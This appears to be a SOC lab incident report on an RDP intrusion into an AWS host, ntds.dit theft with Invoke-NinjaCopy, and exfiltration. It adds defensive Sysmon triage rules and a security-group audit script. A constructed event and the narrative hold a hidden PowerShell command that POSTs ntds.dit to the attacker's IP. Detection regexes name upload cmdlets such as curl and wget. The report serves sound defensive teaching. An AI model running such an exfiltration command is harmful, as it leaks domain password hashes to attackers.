🔍 What
An attacker at 185.107.56.72 connected over RDP directly to host Paul via its externally exposed AWS-facing NIC (172.31.30.36 / EC2AMAZ-ILGVOIN.us-east-2.compute.internal). Sysmon Event ID 3 with Initiated: false and DestinationPort: 3389 confirms the inbound connection. Paul is a dual-NIC AWS EC2 instance: it is visible on the internal network as 172.16.17.223 and reachable from the internet via its VPC NIC at 172.31.30.36. The logon type 3 and 7 events reflect RDP session authentication to Paul itself (type 3 is what NLA pre-authentication produces, type 7 a session unlock/reconnect), not lateral movement from a separate host.
After gaining RDP access, the attacker downloaded Invoke-NinjaCopy.ps1 to C:\temp and used it to copy ntds.dit by reading the raw NTFS volume, which bypasses both the file-API hooks that security tooling relies on and the lock the running directory service holds on ntds.dit. The staged copy was exfiltrated with a PowerShell Invoke-WebRequest POST to the attacker's server at https://185.107.56.72:8000/upload. The device action was Allowed at the time of detection; the endpoint has since been isolated.
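The three artefacts this section leans on (the accepted TCP/3389 connection from a public source, the RuntimeBroker.exe → powershell.exe parent/child, and a PowerShell command line POSTing a staged file to a public host) are each a one-line rule over Sysmon data. The block below is an added example, not part of the original report: the Sysmon records are constructed to mirror the events described here (plus two benign controls) and are not real telemetry, and the field names follow Sysmon's EventData as a SIEM would flatten them.

```python
"""Triage rules for inbound RDP from a public source (Sysmon EID 3), a shell
spawned by RuntimeBroker.exe (EID 1), and a PowerShell upload to a public host.
Added example; the records in SYSMON_EVENTS are constructed, not real telemetry."""
import ipaddress
import ntpath
import re

# Constructed Sysmon records (flattened EventData) mirroring the report.
SYSMON_EVENTS = [
    {"EventID": 3, "UtcTime": "2024-08-23 12:17:26", "Initiated": "false",
     "Protocol": "tcp", "SourceIp": "185.107.56.72", "SourcePort": 51234,
     "DestinationIp": "172.31.30.36", "DestinationPort": 3389,
     "Image": r"C:\Windows\System32\svchost.exe"},
    # Benign control: RDP from an internal admin host over the internal NIC.
    {"EventID": 3, "UtcTime": "2024-08-23 09:02:11", "Initiated": "false",
     "Protocol": "tcp", "SourceIp": "172.16.17.10", "SourcePort": 50211,
     "DestinationIp": "172.16.17.223", "DestinationPort": 3389,
     "Image": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 1, "UtcTime": "2024-08-23 12:19:10",
     "User": r"EC2AMAZ-ILGVOIN\letsdefend",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\RuntimeBroker.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c Invoke-WebRequest -Uri https://185.107.56.72:8000/upload -Method POST -InFile C:\temp\ntds.dit"},
    # Benign control: an interactive user opening PowerShell from Explorer.
    {"EventID": 1, "UtcTime": "2024-08-23 10:41:03",
     "User": r"EC2AMAZ-ILGVOIN\letsdefend",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -c Get-Date"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")
WEB_CMDLET = re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget)\b", re.I)
UPLOAD_HINT = re.compile(r"-method\s+post|-infile\b|-body\b", re.I)


def is_external(host: str) -> bool:
    """True for a globally routable IP. A bare hostname cannot be classified
    offline, so it is treated as external (the conservative choice for triage)."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return True


def inbound_rdp_from_public(ev: dict) -> bool:
    """Sysmon EID 3: accepted (Initiated=false) TCP/3389 from a public source."""
    return (ev.get("EventID") == 3
            and str(ev.get("Initiated", "")).lower() == "false"
            and int(ev.get("DestinationPort", 0)) == 3389
            and is_external(ev.get("SourceIp", "")))


def runtimebroker_spawned_shell(ev: dict) -> bool:
    """Sysmon EID 1: RuntimeBroker.exe should never be the parent of a shell."""
    return (ev.get("EventID") == 1
            and ntpath.basename(ev.get("ParentImage", "")).lower() == "runtimebroker.exe"
            and ntpath.basename(ev.get("Image", "")).lower() in SHELLS)


def powershell_upload_to_public(ev: dict) -> bool:
    """Sysmon EID 1: a web cmdlet with POST/-InFile/-Body aimed at a public host."""
    if ev.get("EventID") != 1:
        return False
    cl = ev.get("CommandLine", "")
    if not (WEB_CMDLET.search(cl) and UPLOAD_HINT.search(cl)):
        return False
    return any(is_external(h) for h in URL_HOST.findall(cl))


RULES = [inbound_rdp_from_public, runtimebroker_spawned_shell, powershell_upload_to_public]


def triage(events):
    """Run every rule over every event; findings come back in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                findings.append({"rule": rule.__name__, "time": ev["UtcTime"], "event": ev})
    return findings


if __name__ == "__main__":
    for f in triage(SYSMON_EVENTS):
        print(f["time"], f["rule"])
```

Run against the constructed records, the two benign controls produce nothing and the three report artefacts each surface once. The RDP rule keys on Initiated: false rather than on the source port so that outbound RDP from Paul (which would also show DestinationPort 3389) is not confused with the inbound connection the report describes.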
🕐 When
- Aug 23, 2024, 12:17:26 PM: Sysmon Event ID 3 confirms inbound RDP from 185.107.56.72 to Paul's AWS NIC (172.31.30.36) on port 3389
- Aug 23, 2024, ~12:17 PM: Logon type 3 and 7 on Paul, RDP session authentication under the letsdefend account
- Aug 23, 2024, 12:19 PM: Alert triggered on NinjaCopy execution; ntds.dit copied to C:\temp\ntds.dit and exfiltrated to 185.107.56.72:8000/upload
📍 Where
- 172.16.17.223 (Paul, internal NIC)
- 172.31.30.36 (Paul, AWS-facing NIC, EC2AMAZ-ILGVOIN.us-east-2.compute.internal)
- 185.107.56.72 (attacker)
- C:\temp\ntds.dit
- https://185.107.56.72:8000/upload
👤 Who
External attacker from 185.107.56.72, flagged malicious on AbuseIPDB. The attacker accessed Paul directly through its AWS-facing NIC, which was reachable from the internet — bypassing perimeter controls monitoring the internal network. Compromised account letsdefend was used to authenticate the RDP session. The anomalous RuntimeBroker.exe → powershell.exe parent-child relationship observed post-RDP access is consistent with DCOM-based execution.
❓ Why
The attacker's objective was Active Directory credential harvesting. Paul's dual-NIC configuration, with one interface exposed to the internet via AWS, provided a direct entry point that circumvented internal perimeter monitoring. NinjaCopy was chosen over conventional tools (ntdsutil, vssadmin) because it reads raw NTFS volume data, so the copy of ntds.dit does not go through the file APIs that API-level monitoring watches; note that the script execution itself was still visible, which is what raised the alert. The exfiltrated ntds.dit enables offline extraction of every domain account's password hashes for cracking or pass-the-hash attacks.
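The root cause is that TCP/3389 on Paul's VPC NIC was reachable from the internet. The check a responder wants next is whether the instance's security group still allows that, and for which other instances. The block below is an added example, not from the report: the security group is constructed in the shape boto3's describe_security_groups() returns (the GroupId is hypothetical), so the same functions can be pointed at live output.

```python
"""Audit an EC2 security group for RDP reachable from outside private address
space. Added example; EXPOSED_SG is a constructed group in the boto3
describe_security_groups() shape, not a real group from the incident."""
import ipaddress

# Source ranges that are not internet-reachable: RFC 1918 (v4) and ULA (v6).
TRUSTED = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]

# Constructed: a group that mirrors the exposure described for Paul's VPC NIC.
EXPOSED_SG = {
    "GroupId": "sg-0123456789abcdef0",  # hypothetical
    "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "172.16.0.0/12"}], "Ipv6Ranges": []},
        {"IpProtocol": "-1",
         "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": []},
    ],
}


def permission_covers(perm: dict, port: int) -> bool:
    """IpProtocol -1 means all protocols and ports; tcp needs port in [FromPort, ToPort]."""
    if perm.get("IpProtocol") == "-1":
        return True
    if perm.get("IpProtocol") != "tcp":
        return False
    lo, hi = perm.get("FromPort"), perm.get("ToPort")
    return lo is not None and hi is not None and lo <= port <= hi


def source_scope(cidr: str) -> str:
    """'anywhere' for a /0, 'private' if fully inside RFC 1918 / ULA, else 'public'.
    Deliberately avoids ip_network(...).is_private, which is True for 0.0.0.0/0."""
    net = ipaddress.ip_network(cidr, strict=False)
    if net.prefixlen == 0:
        return "anywhere"
    if any(net.version == t.version and net.subnet_of(t) for t in TRUSTED):
        return "private"
    return "public"


def exposed_sources(sg: dict, port: int = 3389) -> list:
    """(cidr, scope) for every non-private source that can reach `port`."""
    out = []
    for perm in sg.get("IpPermissions", []):
        if not permission_covers(perm, port):
            continue
        cidrs = [r["CidrIp"] for r in perm.get("IpRanges", [])]
        cidrs += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
        for cidr in cidrs:
            scope = source_scope(cidr)
            if scope != "private":
                out.append((cidr, scope))
    return out


if __name__ == "__main__":
    print(EXPOSED_SG["GroupId"], exposed_sources(EXPOSED_SG))
```

A security group is only one layer: the NIC also needs a public IP and a route to an internet gateway, and a network ACL can block what the group allows, so an empty result here does not by itself prove 3389 is unreachable. A non-empty result, as for the constructed group, is enough to act on.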
🎯 MITRE ATT&CK
| ID | Tactic | Technique |
|---|---|---|
| T1133 | Initial Access | External Remote Services (RDP exposed on the internet-facing NIC) |
| T1078 | Initial Access | Valid Accounts (letsdefend) |
| T1059.001 | Execution | Command and Scripting Interpreter: PowerShell |
| T1105 | Command and Control | Ingress Tool Transfer (Invoke-NinjaCopy.ps1 downloaded to C:\temp) |
| T1006 | Defense Evasion | Direct Volume Access |
| T1003.003 | Credential Access | OS Credential Dumping: NTDS |
| T1074.001 | Collection | Data Staged: Local Data Staging (C:\temp\ntds.dit) |
| T1048.002 | Exfiltration | Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol |
📋 IOCs
| Type | Value | Context |
|---|---|---|
| IP | 185.107.56.72 | Attacker IP: RDP source and exfil server, flagged malicious on AbuseIPDB |
| IP | 172.31.30.36 | Paul's AWS-facing NIC: externally reachable RDP entry point |
| URL | https://185.107.56.72:8000/upload | Exfil POST destination |
| File | C:\temp\ntds.dit | Staged copy of the AD database |
| File | C:\temp\Invoke-NinjaCopy.ps1 | PowerSploit tool used for direct volume access |
| Hash | 975803E4B80DB0C3B3C8A1E8074DA3F5A5C77C710CBF96DE38CAF9744DD76C9B | SHA256 of Invoke-NinjaCopy.ps1 |
| Account | letsdefend | Compromised account used for RDP authentication |
| Process | RuntimeBroker.exe → powershell.exe | Anomalous parent-child, consistent with DCOM abuse |
🔬 Analysis Reports
- 🦠 VirusTotal (URL report): https://www.virustotal.com/gui/url/de79c92942c8114779bafd424e2d19526e10e43cb0d091749b9dfa710c8306c3
- 🦠 VirusTotal (Invoke-NinjaCopy.ps1, SHA256 975803e4…): https://www.virustotal.com/gui/file/975803e4b80db0c3b3c8a1e8074da3f5a5c77c710cbf96de38caf9744dd76c9b
- AbuseIPDB (185.107.56.72): https://www.abuseipdb.com/check/185.107.56.72?page=2